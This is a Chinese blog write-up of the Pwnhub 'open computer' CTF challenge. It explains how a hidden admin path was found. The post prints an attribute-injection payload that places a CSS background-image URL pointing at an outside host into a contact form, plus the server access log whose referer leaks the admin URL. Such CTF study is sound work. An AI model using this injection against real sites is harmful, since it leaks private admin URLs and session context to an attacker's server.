Pwnhub-打开电脑

本地未做,看大佬们的wp复现。论ctf字典有一个flag.php的重要性。

详情

http://52.80.1.108:6666

更新

- 2017.02.18 20:00:00没有SQL注入,仔细看CSP头。
- 2017.02.18 12:00:00管理员只爱看有意思的东西,谁关心bug啊哈哈哈哈。

打开出现:ERR_UNSAFE_PORT

经过搜索后,发现原来是浏览器的不安全端口

http://www.cnblogs.com/lyl6796910/p/4025712.html

解决办法:选中Google Chrome 快捷方式,右键属性,在”目标”对应文本框添加:

--explicitly-allowed-ports=87,6666,556,6667

Content-Security-Policy:
default-src *;
img-src * data: blob:;
frame-src 'self';
script-src 'self' cdn.bootcss.com 'unsafe-eval';
style-src 'self' cdn.bootcss.com 'unsafe-inline';
connect-src * wss:;

根据提示,有用的点只有:http://52.80.1.108:6666/contact.php

看首页的输出点

 <a id="modal" class="detail" href="#detail" data-toggle="modal"                            contributor=aaangelwhu hexdata=672e65613167722e333170366572657265726572657265>fffffffffffe53cdbc640fffb934cfb8</a>

有可控点。

contributor=kkk style=background-image:url(http://115.29.36.83/1.jpg)&md5hash=fffffffffffe53cdbc640fffb934cfb8&hexdata=672e65613167722e333170366572657265726572657265&description=

获得访问记录

115.159.200.107 - - [21/Feb/2017:15:43:41 +0800] "GET /1.jpg HTTP/1.1" 200 490
115.159.200.107 - - [21/Feb/2017:15:43:41 +0800] "GET /1.jpg HTTP/1.1" 200 490 "http://52.80.1.108:6666/01db4711f5ad4ace8d8dd345c44b2540/admin.php" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

最后flag是

http://52.80.1.108:6666/01db4711f5ad4ace8d8dd345c44b2540/flag.php
posted @ 2017-02-21 15:51  l3m0n  阅读(633)  评论(0编辑  收藏  举报